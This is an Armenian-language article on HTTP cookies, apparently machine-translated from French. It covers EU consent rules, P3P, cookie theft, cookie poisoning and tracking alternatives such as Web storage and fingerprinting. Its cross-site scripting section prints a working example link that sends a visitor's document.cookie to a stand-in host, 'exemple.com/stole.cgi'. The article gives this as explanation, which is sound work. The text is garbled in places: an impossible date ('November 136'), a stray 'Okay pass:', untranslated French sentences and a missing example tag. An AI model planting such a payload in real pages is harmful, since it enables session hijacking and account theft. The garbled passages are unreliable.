Այս նյութը թարմացվել է 2009 թվականի նոյեմբերի 136-ի 25/2009/EC հրահանգով, որը սահմանում է, որ «բաժանորդի կամ օգտագործողի տերմինալային սարքավորումներում տեղեկատվության պահպանումը կամ արդեն պահված տեղեկատվության հասանելիությունը թույլատրվում է միայն այն պայմանով, որ բաժանորդը կամ օգտագործողը տվել է իր համաձայնությունը՝ 95/46/ԵՀ հրահանգի համաձայն, մշակման նպատակների վերաբերյալ այլ անձանց միջև հստակ և ամբողջական տեղեկատվություն ստանալուց հետո»։ Հետևաբար, նոր հրահանգը ուժեղացնում է պարտավորությունները՝ նախքան ինտերնետ օգտագործողի համակարգչում թխուկներ տեղադրելը:

Հրահանգի նախնական նկատառումներում եվրոպական օրենսդիրը, սակայն, սահմանում է. «Երբ տեխնիկապես հնարավոր է և արդյունավետ, 95/46/ԵՀ հրահանգի համապատասխան դրույթներին համապատասխան, օգտագործողի համաձայնությունը վերամշակման վերաբերյալ կարող է արտահայտվել. բրաուզերի կամ այլ հավելվածի համապատասխան կարգավորումների օգտագործումը»: Բայց իրականում, մինչ օրս ոչ մի զննարկիչ հնարավորություն չի տալիս տարանջատել հիմնական տեխնիկական թխուկները կամընտիրներից, որոնք պետք է թողնվեն օգտատիրոջ ընտրությանը:

Այս նոր հրահանգը բելգիացի պատգամավորների կողմից փոխադրվել է 2012 թվականի հուլիսին: 2014 թվականի ուսումնասիրությունը ցույց է տալիս, որ նույնիսկ պատգամավորները պայքարում են դիմելու համար: հրահանգի սահմանափակումները.

P3P

P3P-ի ճշգրտումը ներառում է սերվերի կողմից գաղտնիության քաղաքականություն սահմանելու հնարավորությունը, որը սահմանում է, թե ինչպիսի տեղեկատվություն է հավաքում և ինչ նպատակով: Այս քաղաքականությունները ներառում են (բայց չեն սահմանափակվում դրանով) քուքիների միջոցով հավաքված տեղեկատվության օգտագործումը: Համաձայն P3P-ի սահմանումների՝ զննարկիչը կարող է ընդունել կամ մերժել թխուկները՝ համեմատելով գաղտնիության քաղաքականությունը օգտատիրոջ նախասիրությունների հետ կամ հարցնելով օգտատիրոջը՝ ներկայացնելով սերվերի կողմից հայտարարված գաղտնիության քաղաքականության գաղտնիության հայտարարությունը:

Շատ բրաուզերներ, ներառյալ Apple Safari-ն և Microsoft Internet Explorer-ի 6-րդ և 7-րդ տարբերակները, աջակցում են P3P-ին, որը թույլ է տալիս դիտարկիչին որոշել, թե արդյոք ընդունել երրորդ կողմի թխուկների պահեստավորումը: Opera բրաուզերը թույլ է տալիս օգտվողներին հրաժարվել երրորդ կողմի թխուկներից և ստեղծել գլոբալ և հատուկ անվտանգության պրոֆիլ ինտերնետ տիրույթների համար: Mozilla Firefox-ի 2-րդ տարբերակը դադարեցրեց P3P-ի աջակցությունը, բայց այն վերականգնեց 3-րդ տարբերակում:

Երրորդ կողմի թխուկները կարող են արգելափակվել բրաուզերների մեծ մասի կողմից՝ գաղտնիությունը բարձրացնելու և գովազդի հետևումը նվազեցնելու համար՝ առանց օգտատիրոջ վեբ փորձի վրա բացասաբար ազդելու: Շատ գովազդային գործակալություններ առաջարկում են տարբերակ հրաժարվել նպատակային գովազդի համար, զննարկիչում տեղադրելով ընդհանուր թխուկ, որն անջատում է այս թիրախավորումը, սակայն նման լուծումը գործնականում արդյունավետ չէ, երբ այն հարգվում է, քանի որ այս ընդհանուր թխուկը ջնջվում է հենց որ օգտատերը ջնջում է այդ թխուկները, ինչը չեղարկում է ընտրությունը։ դուրս որոշումը.

Թխվածքաբլիթների թերությունները

Բացի գաղտնիության հետ կապված խնդիրներից, թխուկներն ունեն նաև որոշ տեխնիկական թերություններ: Մասնավորապես, նրանք միշտ չէ, որ ճշգրիտ նույնականացնում են օգտատերերին, նրանք կարող են դանդաղեցնել կայքի աշխատանքը մեծ թվով, դրանք կարող են օգտագործվել անվտանգության հարձակումների համար և հակասում են ներկայացուցչական պետության փոխանցմանը, ծրագրաշարի ճարտարապետական ​​ոճին:

Ոչ ճշգրիտ նույնականացում

Եթե ​​համակարգչում օգտագործվում է մեկից ավելի բրաուզեր, ապա դրանցից յուրաքանչյուրում միշտ կա թխուկների առանձին պահեստավորման միավոր: Հետևաբար, թխուկները չեն ճանաչում անձին, այլ օգտատիրոջ հաշվի, համակարգչի և վեբ բրաուզերի համակցությունը: Այսպիսով, յուրաքանչյուր ոք կարող է օգտագործել այս հաշիվները, համակարգիչները կամ բրաուզերները, որոնք ունեն թխուկների համախումբ: Նմանապես, թխուկները չեն տարբերում մի քանի օգտատերերի միջև, ովքեր կիսում են նույն օգտատիրոջ հաշիվը, համակարգիչը և բրաուզերը, օրինակ՝ «ինտերնետ սրճարաններում» կամ համակարգչային ռեսուրսներին անվճար մուտք ունեցող ցանկացած վայրում:

Բայց գործնականում այս հայտարարությունը շատ դեպքերում պարզվում է, որ սխալ է, քանի որ այսօր «անձնական» համակարգիչը (կամ սմարթֆոնը կամ պլանշետը, որն ավելի վատ է) օգտագործվում է հիմնականում մեկ անհատի կողմից: Սա նշանակում է թիրախավորել կոնկրետ անձի և հավաքագրված տեղեկատվության ծավալի միջոցով հասնում է անհատականացված թիրախավորման, նույնիսկ եթե անձը «անվանապես» նույնականացված չէ:

Թխուկը կարող է գողանալ ցանցի մեկ այլ համակարգչի կողմից:

Նորմալ աշխատանքի ընթացքում քուքիները հետ են ուղարկվում սերվերի (կամ նույն տիրույթում գտնվող սերվերների խմբի) և օգտագործողի համակարգչային բրաուզերի միջև: Քանի որ թխուկները կարող են պարունակել զգայուն տեղեկատվություն (օգտանուն, նույնականացման համար օգտագործվող գաղտնաբառ և այլն), դրանց արժեքները չպետք է հասանելի լինեն այլ համակարգիչների համար: Cookie-ի գողությունը չարտոնված երրորդ կողմի կողմից թխուկների գաղտնալսման գործողություն է:

Թխուկները կարող են գողացվել փաթեթների հայտնաբերման միջոցով, որը կոչվում է նիստի առևանգում: Ցանցում երթևեկությունը կարող է գաղտնալսվել և կարդալ այլ համակարգիչներով, բացառությամբ ուղարկողների և ստացողների (հատկապես չգաղտնագրված հանրային Wi-Fi տարածքում): Այս տրաֆիկը ներառում է քուքիներ, որոնք ուղարկվում են նիստերի ընթացքում՝ օգտագործելով պարզ HTTP արձանագրություն: Երբ ցանցային երթևեկությունը գաղտնագրված չէ, չարամիտ օգտատերերը կարող են այդպիսով կարդալ ցանցի այլ օգտատերերի հաղորդակցությունները՝ օգտագործելով «փաթեթների սնիֆերներ»:

Այս խնդիրը կարելի է հաղթահարել՝ գաղտնագրելով օգտատիրոջ համակարգչի և սերվերի միջև կապը՝ օգտագործելով HTTPS արձանագրությունը: Սերվերը կարող է նշել a ապահով դրոշ թխուկի տեղադրման ժամանակ; զննարկիչը այն կուղարկի միայն ապահով գծով, օրինակ՝ SSL կապով:

Այնուամենայնիվ, շատ կայքեր, թեև օգտագործում են HTTPS գաղտնագրված հաղորդակցություն օգտատերերի նույնականացման համար (այսինքն՝ մուտքի էջը), հետագայում աշխատաշրջանի թխուկներ և այլ տվյալներ են ուղարկում սովորականի նման՝ չգաղտնագրված HTTP կապերի միջոցով՝ արդյունավետության նկատառումներով: Այդպիսով հարձակվողները կարող են գաղտնալսել այլ օգտատերերի թխուկները և անձնավորել դրանք համապատասխան կայքերում կամ օգտագործել դրանք թխուկների գրոհներում:

Սկրիպտավորում կայքում. թխուկը, որը պետք է փոխանակվի միայն սերվերի և հաճախորդի միջև, ուղարկվում է մեկ այլ երրորդ կողմի:

Թխուկները գողանալու մեկ այլ միջոց է կայքերի սկրիպտը և բրաուզերն ինքն ուղարկել թխուկները վնասակար սերվերներին, որոնք երբեք չեն ստանում դրանք: Ժամանակակից բրաուզերները թույլ են տալիս սերվերից կոդի պահանջվող մասերի կատարումը: Եթե ​​քուքիները հասանելի են գործարկման ընթացքում, դրանց արժեքները կարող են ինչ-որ ձևով փոխանցվել սերվերներին, որոնք չպետք է մուտք գործեն դրանք: Թխուկների գաղտնագրումը նախքան դրանք ցանցով ուղարկելը չի ​​օգնում կանխել հարձակումը:

Ներքին սկրիպտավորման այս տեսակը սովորաբար օգտագործվում է հարձակվողների կողմից կայքերում, որոնք թույլ են տալիս օգտվողներին տեղադրել HTML բովանդակություն: Համատեղելի կոդի մի մասն ինտեգրելով HTML ներդրման մեջ՝ հարձակվողը կարող է ստանալ թխուկներ այլ օգտվողներից: Այս թխուկների մասին գիտելիքները կարող են օգտագործվել՝ միանալով նույն կայքին՝ օգտագործելով գողացված թխուկները, այդպիսով ճանաչվելով որպես օգտվող, ում թխուկները գողացվել են:

Նման հարձակումները կանխելու եղանակներից մեկը HttpOnly դրոշի օգտագործումն է. դա տարբերակ է, որը ներդրվել է Internet Explorer-ի 6-րդ տարբերակից սկսած PHP-ում 5.2.0 տարբերակից սկսած, որը նախատեսված է սկրիպտին մոտ գտնվող հաճախորդի համար թխուկը անհասանելի դարձնելու համար: Այնուամենայնիվ, վեբ մշակողները պետք է հաշվի առնեն դա իրենց կայքի մշակման ժամանակ, որպեսզի նրանք անձեռնմխելի լինեն կայքում սկրիպտավորումից:

Անվտանգության մեկ այլ սպառնալիք, որն օգտագործվում է կայքում, պահանջարկի կեղծումն է:

Պաշտոնական տեխնիկական բնութագրերը թույլ են տալիս քուքիները հետ ուղարկել միայն այն տիրույթի սերվերներին, որտեղից դրանք ծագել են: Այնուամենայնիվ, թխուկների արժեքը կարող է ուղարկվել այլ սերվերներ՝ օգտագործելով թխուկների վերնագրերից բացի այլ միջոցներ:

Մասնավորապես, JavaScript-ի նման սկրիպտային լեզուներին սովորաբար թույլատրվում է մուտք գործել թխուկների արժեքներ և կարող են կամայական արժեքներ ուղարկել ինտերնետի ցանկացած սերվեր: Այս սկրիպտավորման հնարավորությունը օգտագործվում է կայքերից, որոնք թույլ են տալիս օգտվողներին տեղադրել HTML բովանդակություն այլ օգտվողների համար դիտելու համար:

Օրինակ՝ example.com տիրույթում գործող հարձակվողը կարող է հրապարակել հետևյալ հղումը պարունակող մեկնաբանություն՝ մատնանշելով հանրաճանաչ բլոգ, որը նրանք այլ կերպ չեն վերահսկում.

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Երբ մեկ այլ օգտատեր կտտացնում է այս հղումը, զննարկիչը կատարում է կոդի onclick հատկանիշի մասը, ուստի այն փոխարինում է document.cookie տողը օգտվողի թխուկների ցանկով, որոնք ակտիվ են այս էջի համար: Հետևաբար, թխուկների այս ցանկն ուղարկվում է example.com սերվերին, և հարձակվողը, հետևաբար, կարող է հավաքել այս օգտվողի թխուկները:

Հարձակման այս տեսակը դժվար է հայտնաբերել օգտագործողի կողմից, քանի որ սկրիպտը գալիս է նույն տիրույթից, որը սահմանել է թխուկը, և արժեքները ուղարկելու գործողությունը, ըստ երևույթին, լիազորված է այդ տիրույթի կողմից: Համարվում է, որ այս տեսակի կայքերը շահագործող ադմինիստրատորների պարտականությունն է վնասակար կոդի հրապարակումը կանխող սահմանափակումներ դնելը։

Թխուկները ուղղակիորեն տեսանելի չեն JavaScript-ի նման հաճախորդի կողմից տեղադրված ծրագրերին, եթե դրանք ուղարկվել են HttpOnly դրոշով: Սերվերի տեսանկյունից միակ տարբերությունն այն է, որ Set-Cookie վերնագրի տողում ավելացված է HttpOnly տողը պարունակող նոր դաշտ.

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Երբ զննարկիչը ստանում է նման թխուկ, ենթադրվում է, որ այն սովորաբար օգտագործում է հետևյալ HTTP փոխանակման մեջ, բայց առանց այն տեսանելի դարձնելու հաճախորդի կողմից կատարված սկրիպտների համար: HttpOnly դրոշը որևէ պաշտոնական տեխնիկական բնութագրի մաս չէ և չի ներդրված բոլոր բրաուզերներում: Նկատի ունեցեք, որ ներկայումս XMLHTTPRequest մեթոդով սեսիայի թխուկների ընթերցումն ու գրելը կանխելու միջոց չկա:

Բովանդակության փոփոխություն. հարձակվողը անվավեր թխուկ է ուղարկում սերվեր, որը հնարավոր է պատրաստված լինի սերվերի կողմից ուղարկված վավեր թխուկից:

Հենց որ թխուկները պետք է պահվեն և անփոփոխ վերադարձվեն սերվեր, հարձակվողը կարող է փոփոխել թխուկների արժեքը՝ նախքան դրանք սերվեր ուղարկելը: Օրինակ, եթե թխուկը պարունակում է ընդհանուր արժեքը, որը օգտվողը պետք է վճարի խանութի զամբյուղում տեղադրված ապրանքների համար, այս արժեքի փոփոխությունը սերվերին ենթարկում է հարձակվողից մեկնարկային գնից ցածր գանձելու ռիսկի: Թխուկների արժեքի փոփոխման գործընթացը կոչվում է թխվածքաբլիթների թունավորում և կարող է օգտագործվել թխուկների գողությունից հետո՝ հարձակումը շարունակական դարձնելու համար:

Թխուկների վերացման մեթոդում հարձակվողն օգտագործում է դիտարկիչի անսարքությունը՝ անվավեր թխուկ սերվեր ուղարկելու համար:

Կայքերից շատերը, այնուամենայնիվ, պահում են միայն սեսիայի ID-ն՝ պատահականորեն ստեղծված եզակի համարը, որն օգտագործվում է սեսիայի օգտատիրոջը նույնականացնելու համար, բուն cookie-ում, մինչդեռ մնացած բոլոր տեղեկությունները պահվում են սերվերում: Այս դեպքում այս խնդիրը մեծապես լուծված է։

Ակնկալվում է, որ յուրաքանչյուր կայք կունենա իր սեփական թխուկները, ուստի մեկ կայք չպետք է կարողանա փոփոխել կամ ստեղծել մեկ այլ կայքի հետ կապված թխուկներ: Վեբ բրաուզերի անվտանգության թերությունը կարող է թույլ տալ, որ վնասակար կայքերը խախտեն այս կանոնը: Նման թերության շահագործումը սովորաբար կոչվում է խաչմերուկի պատրաստում. Նման հարձակումների նպատակը կարող է լինել նիստի ID գողությունը:

Օգտագործողները պետք է օգտագործեն վեբ բրաուզերների վերջին տարբերակները, որոնցում այդ խոցելիությունները գործնականում վերացված են:

Հաճախորդի և սերվերի միջև կոնֆլիկտային վիճակ

Թխուկների օգտագործումը կարող է հակասություն առաջացնել հաճախորդի վիճակի և քուքի մեջ պահվող վիճակի միջև: Եթե ​​օգտատերը ձեռք է բերում թխուկ և սեղմում բրաուզերի «Վերադառնալ» կոճակը, զննարկիչի վիճակը հիմնականում նույնը չէ, ինչ այս ձեռքբերումից առաջ: Օրինակ, եթե առցանց խանութի զամբյուղը ստեղծվել է թխուկների միջոցով, ապա զամբյուղի պարունակությունը չի կարող փոխվել, երբ օգտատերը վերադառնում է բրաուզերի պատմություն. եթե օգտագործողը սեղմում է կոճակը իր զամբյուղում հոդված ավելացնելու համար և սեղմում է «Վերադարձ»: « կոճակը, հոդվածը մնում է այս մեկում։ Սա կարող է չլինել օգտատիրոջ մտադրությունը, ով, անշուշտ, ցանկանում է չեղարկել հոդվածի ավելացումը։ Սա կարող է հանգեցնել անհուսալիության, շփոթության և սխալների: Այսպիսով, վեբ մշակողները պետք է տեղյակ լինեն այս խնդրի մասին և միջոցներ ձեռնարկեն նման իրավիճակները կարգավորելու համար:

Մշտական ​​թխուկները քննադատության են ենթարկվել գաղտնիության անվտանգության փորձագետների կողմից այն բանի համար, որ դրանց ժամկետը շուտով չի ավարտվելու, ինչը թույլ է տալիս կայքերին հետևել օգտատերերին և ժամանակի ընթացքում ստեղծել նրանց պրոֆիլը: Թխուկների այս ասպեկտը նաև սեսիայի առևանգման խնդրի մի մասն է, քանի որ գողացված մշտական ​​քուքիները կարող են օգտագործվել զգալի ժամանակահատվածում օգտատիրոջը նմանակելու համար:

Կարդացեք նաեւ. ԳԱՖԱՄ. ովքե՞ր են նրանք: Ինչու են նրանք (երբեմն) այդքան վախկոտ:

Թխուկների այլընտրանքներ

Որոշ գործողություններ, որոնք կարող են իրականացվել քուքիների միջոցով, կարող են իրականացվել նաև այլ մեխանիզմների միջոցով, որոնք շրջանցում են թխուկները կամ վերստեղծում ջնջված քուքիները, ինչը ստեղծում է գաղտնիության հետ կապված խնդիրներ նույն ձևով (կամ երբեմն ավելի վատ, քանի որ այն ժամանակ անտեսանելի է), քան քուքիները:

IP հասցե

Օգտատերերին կարելի է հետևել էջը զանգող համակարգչի IP հասցեով: Այս տեխնիկան հասանելի է Համաշխարհային սարդոստայնի ներդրումից ի վեր, քանի որ էջերը ներբեռնվում են, սերվերը պահանջում է դիտարկիչով կամ պրոքսիով աշխատող համակարգչի IP հասցեն, եթե ոչ մեկը չի օգտագործվում: Սերվերը կարող է հետևել այս տեղեկատվությանը՝ անկախ նրանից, որ թխուկներ են օգտագործվում, թե ոչ: Այնուամենայնիվ, այս հասցեները սովորաբար ավելի քիչ հուսալի են օգտատիրոջ նույնականացման հարցում, քան քուքիները, քանի որ համակարգիչները և պրոքսիները կարող են համօգտագործվել մի քանի օգտատերերի կողմից, և նույն համակարգիչը կարող է ստանալ տարբեր IP հասցե յուրաքանչյուր աշխատանքային նստաշրջանում (ինչպես, օրինակ, հաճախ հեռախոսային կապերի դեպքում): .

IP հասցեներով հետևելը կարող է հուսալի լինել որոշ իրավիճակներում, ինչպիսիք են լայնաշերտ կապերը, որոնք պահպանում են նույն IP հասցեն երկար ժամանակ, քանի դեռ հոսանքը միացված է:

Որոշ համակարգեր, ինչպիսիք են Tor-ը, նախագծված են ինտերնետի անանունությունը պահպանելու և IP հասցեով հետևելը անհնարին կամ անիրագործելի դարձնելու համար:

URL

Ավելի ճշգրիտ տեխնիկան հիմնված է URL-ներում տեղեկատվության ներդրման վրա: URL-ի հարցման տողային մասը տեխնիկաներից մեկն է, որը սովորաբար օգտագործվում է այս նպատակով, բայց կարող են օգտագործվել նաև այլ մասեր: Ե՛վ Java serverlet-ը, և՛ PHP սեսիայի մեխանիզմները օգտագործում են այս մեթոդը, եթե թխուկները միացված չեն:

Այս մեթոդը ներառում է վեբ սերվերի կողմից լարային հարցումների ավելացում այն ​​վեբ էջի հղումներին, որը այն կրում է այն բրաուզերին ուղարկելիս: Երբ օգտվողը հետևում է հղմանը, զննարկիչը սերվերին է վերադարձնում հարցման կցված տողը:

Այս նպատակով օգտագործվող հարցումների տողերը և թխուկները շատ նման են՝ և՛ սերվերի կողմից կամայականորեն ընտրված, և՛ զննարկիչի կողմից վերադարձվող տեղեկատվություն: Այնուամենայնիվ, կան որոշ տարբերություններ. երբ հարցման տող պարունակող URL-ը նորից օգտագործվում է, նույն տեղեկատվությունը ուղարկվում է սերվեր: Օրինակ, եթե օգտվողի նախապատվությունները կոդավորված են URL-ի հարցման տողում, և օգտատերը էլփոստի միջոցով ուղարկում է այդ URL-ը մեկ այլ օգտվողի, այդ օգտվողը նույնպես կկարողանա օգտագործել այդ նախապատվությունները:

Մյուս կողմից, երբ օգտվողը երկու անգամ մուտք է գործում նույն էջը, երաշխիք չկա, որ նույն հարցման տողը երկու անգամ էլ կօգտագործվի: Օրինակ, եթե օգտատերը առաջին անգամ վայրէջք է կատարում ներքին կայքի էջի վրա և երկրորդ անգամ հայտնվում է արտաքին էջից նույն էջում, ապա կայքի էջի հետ կապված հարցման տողը սովորաբար տարբեր է, մինչդեռ քուքիները նույնն են: .

Հարցման տողերի այլ թերությունները կապված են անվտանգության հետ. տվյալների պահպանումը, որը նույնականացնում է նիստը հարցման տողերում, հնարավորություն է տալիս կամ պարզեցնում նստաշրջանի ամրագրման հարձակումները, նույնացուցիչի հղման հարձակումները և այլ շահագործում: Աշխատաշրջանի ID-ների փոխանցումը որպես HTTP թխուկներ ավելի ապահով է:

Թաքնված ձևի դաշտ

Նիստի հետևման ձևերից մեկը, որն օգտագործվում է ASP.NET-ի կողմից, թաքնված դաշտերով վեբ ձևերի օգտագործումն է: Այս տեխնիկան շատ նման է URL-ի հարցումների տողերի օգտագործմանը տեղեկատվություն տեղափոխելու համար և ունի նույն առավելություններն ու թերությունները. և եթե ձևը մշակվում է HTTP GET մեթոդով, ապա դաշտերը իրականում դառնում են բրաուզերի URL-ի մի մասը, որը կուղարկի այն ձևը ներկայացնելիս: Բայց ձևերի մեծ մասը մշակվում է HTTP POST-ով, ինչի պատճառով ձևի տեղեկատվությունը, ներառյալ թաքնված դաշտերը, ավելացվում են որպես լրացուցիչ մուտքագրում, որը ոչ URL-ի մաս է, ոչ էլ քուքի:

Այս մոտեցումը հետևելու տեսանկյունից երկու առավելություն ունի. նախ՝ HTML-ի սկզբնաղբյուրում և POST մուտքագրված տեղեկատվությանը հետևելը, քան URL-ը, թույլ կտա սովորական օգտագործողին խուսափել այս հետևումից։ երկրորդ, նիստի տեղեկատվությունը չի պատճենվում, երբ օգտվողը պատճենում է URL-ը (էջը սկավառակի վրա պահելու կամ էլփոստով ուղարկելու համար, օրինակ):

պատուհան.անուն

Բոլոր սովորական վեբ բրաուզերները կարող են պահպանել բավականին մեծ քանակությամբ տվյալներ (2 ՄԲ-ից մինչև 32 ՄԲ) JavaScript-ի միջոցով՝ օգտագործելով DOM-ի window.name հատկությունը: Այս տվյալները կարող են օգտագործվել նստաշրջանի քուքիների փոխարեն և օգտագործվում են նաև տիրույթներում: Տեխնիկան կարող է զուգակցվել JSON օբյեկտների հետ՝ հաճախորդի կողմից նստաշրջանի փոփոխականների բարդ հավաքածու պահելու համար:

Բացասական կողմն այն է, որ յուրաքանչյուր առանձին պատուհան կամ ներդիր սկզբում կունենա դատարկ window.name; երբ թերթելիս ըստ ներդիրների (բացված օգտատիրոջ կողմից) դա նշանակում է, որ առանձին բացված ներդիրները պատուհանի անուն չեն ունենա: Բացի այդ, window.name-ը կարող է օգտագործվել տարբեր կայքերում այցելուներին հետևելու համար, որոնք կարող են գաղտնիության հետ կապված խնդիրներ առաջացնել:

Որոշ առումներով սա կարող է ավելի ապահով լինել, քան քուքիները, սերվերի չներգրավված լինելու պատճառով, այդպիսով այն անխոցելի դարձնելով sniffer cookie-ների ցանցային հարձակման համար: Այնուամենայնիվ, եթե հատուկ միջոցներ են ձեռնարկվում տվյալների պաշտպանության համար, այն խոցելի է հետագա հարձակումների համար, քանի որ տվյալները հասանելի են նույն պատուհանում բացված այլ կայքերի միջոցով:

HTTP նույնականացում

HTTP արձանագրությունը ներառում է մուտքի վավերացման հիմնական արձանագրությունները և մուտքի վավերացման ամփոփագիրը, որը թույլ է տալիս մուտք գործել վեբ էջ միայն այն դեպքում, երբ օգտվողը տվել է օգտվողի անունը և գաղտնաբառը: Okay pass: Եթե ​​սերվերը վկայական է պահանջում վեբ էջ մուտք տրամադրելու համար, զննարկիչը դա խնդրում է օգտվողից և ստանալուց հետո զննարկիչը պահում է այն և ուղարկում այն ​​բոլոր հետագա HTTP հարցումներում: Այս տեղեկատվությունը կարող է օգտագործվել օգտվողին հետևելու համար:

Տեղական ընդհանուր օբյեկտ

Եթե ​​զննարկիչը ներառում է Adobe Flash Player հավելվածը, ապա տեղական ընդհանուր օբյեկտներ կարող է օգտագործվել նույն նպատակով, ինչ թխուկները: Նրանք կարող են գրավիչ ընտրություն լինել վեբ մշակողների համար, քանի որ.

  • տեղական համօգտագործվող օբյեկտի համար լռելյայն չափի սահմանաչափը 100 ԿԲ է;
  • Անվտանգության ստուգումները առանձին են օգտատիրոջ թխուկների ստուգումներից (այնպես որ տեղական համօգտագործվող օբյեկտները կարող են թույլատրվել, երբ թխուկները չկան):

Այս վերջին կետը, որը տարբերում է թխուկների կառավարման քաղաքականությունը Adobe-ի տեղական համօգտագործվող օբյեկտների քաղաքականությունից հարցեր է առաջացնում Օգտատիրոջ կողմից իր գաղտնիության կարգավորումների կառավարման վերաբերյալ. նա պետք է տեղյակ լինի, որ իր կողմից թխուկների կառավարումը որևէ ազդեցություն չունի տեղական ընդհանուր օբյեկտների կառավարման վրա և հակառակը:

Այս համակարգի մեկ այլ քննադատությունն այն է, որ այն կարող է օգտագործվել միայն Adobe Flash Player հավելվածի միջոցով, որը սեփականություն է և ոչ վեբ ստանդարտ:

Հաճախորդի կողմից հաստատակամություն

Որոշ վեբ բրաուզերներ աջակցում են սկրիպտի վրա հիմնված կայունության մեխանիզմ, որը թույլ է տալիս էջին տեղեկատվություն պահել տեղում՝ հետագա օգտագործման համար: Internet Explorer-ը, օրինակ, աջակցում է բրաուզերի պատմության, էջանիշների, XML-ում պահվող ձևաչափի կամ անմիջապես սկավառակի վրա պահված վեբ էջի մշտական ​​տեղեկատվությանը: Microsoft Internet Explorer 5-ի համար կա օգտվողի տվյալների մեթոդ, որը հասանելի է DHTML վարքագծի միջոցով:

W3C-ը HTML 5-ում ներկայացրեց նոր JavaScript API՝ հաճախորդի կողմից տվյալների պահպանման համար, որը կոչվում է Web storage և նպատակ ուներ մշտապես փոխարինել թխուկները: Այն նման է թխուկներին, բայց զգալիորեն բարելավված հզորությամբ և առանց HTTP հարցումների վերնագրում տեղեկատվություն պահելու: API-ն թույլ է տալիս երկու տեսակի վեբ պահեստավորում՝ տեղային և նիստերի պահեստավորում, որը նման է մշտական ​​թխուկների և նստաշրջանի թխուկների (բացառությամբ, որ սեսիայի թխուկների ժամկետը լրանում է, երբ զննարկիչը փակ է, մինչդեռ նիստերի պահեստ համապատասխանաբար լրանում է, երբ ներդիրը փակվում է: Վեբ պահեստը աջակցվում է Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 և Opera 10.50-ով:

Տարբեր մեխանիզմ սովորաբար հիմնված է բրաուզերի քեշավորման վրա (հիշողության մեջ, այլ ոչ թե թարմացման) օգտագործելով JavaScript ծրագրերը վեբ էջերում: 

Օրինակ, էջը կարող է պարունակել պիտակ . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Այս պահին ծրագիրը մնում է քեշի հիշողության մեջ, և այցելած էջը երկրորդ անգամ չի վերաբեռնվում: Հետևաբար, եթե ծրագիրը պարունակում է գլոբալ փոփոխական (օրինակ՝ var id = 3243242;), այս նույնացուցիչը մնում է վավեր և կարող է շահագործվել JavaScript այլ կոդով, երբ էջը նորից բեռնվի, կամ երբ բեռնվի ծրագիրը կապող էջը: 

Այս մեթոդի հիմնական թերությունն այն է, որ JavaScript գլոբալ փոփոխականը պետք է ստատիկ լինի, ինչը նշանակում է, որ այն չի կարող փոփոխվել կամ ջնջվել, ինչպես թխուկը:

վեբ բրաուզերի մատնահետք

Բրաուզերի մատնահետքը նույնականացման նպատակով բրաուզերի կազմաձևման կարգավորումների վերաբերյալ հավաքագրված տեղեկատվություն է: Այս մատնահետքերը կարող են օգտագործվել ինտերնետի օգտատերերի կամ սարքի լրիվ կամ մասնակի նույնականացման համար, նույնիսկ երբ թխուկներն անջատված են:

Վեբ բրաուզերի կազմաձևման հիմնական տեղեկատվությունը վաղուց հավաքագրվել է վեբ-կայքերի լսարանի ծառայությունների կողմից՝ մարդկանց վեբ տրաֆիկի ճշգրիտ չափման և սեղմումների խարդախության տարբեր ձևերի հայտնաբերման նպատակով: Հաճախորդի կողմից սկրիպտային լեզուների օգնությամբ շատ ավելի ճշգրիտ տեղեկատվության հավաքագրումն է այժմ հնարավոր է.

Այս տեղեկատվությունը բիթային տողի վերածելը սարքի մատնահետք է առաջացնում: 2010 թվականին Electronic Frontier Foundation (EFF) բրաուզերի մատնահետքի էնտրոպիան չափել է առնվազն 18,1 bits, և դա եղել է նախքան կտավի մատնահետքերի առաջընթացը 5,7 բիթ ավելացրեց այդ էնտրոպիային:

Թխվածքաբլիթները մի խոսքով

Թխուկները փոքր տեքստային ֆայլեր են, որոնք պահվում են վեբ բրաուզերի կողմից վեբ կայքի այցելուների կոշտ սկավառակի վրա և որոնք օգտագործվում են (ի թիվս այլ բաների)՝ այցելուի կամ կայքի միջոցով նրա ճանապարհորդության մասին տեղեկություններ գրանցելու համար: Այսպիսով, վեբ վարպետը կարող է ճանաչել այցելուի սովորությունները և անհատականացնել իր կայքի ներկայացումը յուրաքանչյուր այցելուի համար. թխուկներն այնուհետև հնարավորություն են տալիս հիշել, թե քանի հոդված պետք է ցուցադրել գլխավոր էջում կամ նույնիսկ պահպանել մուտքի հավատարմագրերը որևէ մասնավոր կողմի համար. երբ այցելուն վերադառնում է կայք, այլևս անհրաժեշտ չէ, որ նա մուտքագրի իր անունը և գաղտնաբառը: ճանաչվեն, քանի որ դրանք ինքնաբերաբար ընթերցվում են թխուկի մեջ:

Cookie-ն ունի սահմանափակ ժամկետ՝ սահմանված կայքի դիզայների կողմից: Դրանք կարող են սպառվել նաև կայքի նիստի ավարտին, որը համապատասխանում է բրաուզերի փակմանը։ Թխուկները լայնորեն օգտագործվում են այցելուների կյանքը հեշտացնելու և նրանց ավելի համապատասխան տեղեկատվություն ներկայացնելու համար: Բայց հատուկ տեխնիկան հնարավորություն է տալիս մի քանի կայքերում հետևել այցելուին և այդպիսով հավաքել և ստուգել նրա սովորությունների վերաբերյալ շատ ընդարձակ տեղեկատվություն: Այս մեթոդը թխուկների օգտագործմանը համբավ է տվել որպես այցելուների գաղտնիությունը խախտող հսկողության տեխնիկա, որը, ցավոք, համապատասխանում է իրականությանը շատ դեպքերում ոչ տեխնիկական պատճառներով կամ օգտագործողի ակնկալիքները չհարգելու համար:

Ի պատասխան այս օրինական մտավախությունների՝ HTML 5-ը ներկայացնում է նոր JavaScript API՝ հաճախորդի կողմից տվյալների պահպանման համար, որը կոչվում է Վեբ պահեստավորում, որը շատ ավելի ապահով է և ավելի մեծ հզորությամբ, որի նպատակն է փոխարինել թխուկները:

Թխուկների պահպանում

Որոշ բրաուզերների դեպքում թխուկը հեշտությամբ խմբագրելի է, տեքստային պարզ խմբագրիչը, ինչպիսին է Notepad-ը, բավական է դրա արժեքները ձեռքով փոխելու համար:

Քուքիները տարբեր կերպ են պահպանվում՝ կախված զննարկիչից.

  • Microsoft Internet Explorer պահում է յուրաքանչյուր թխուկը մեկ այլ ֆայլում;
  • Mozilla Firefox պահպանում է իր բոլոր թխուկները մեկ ֆայլում;
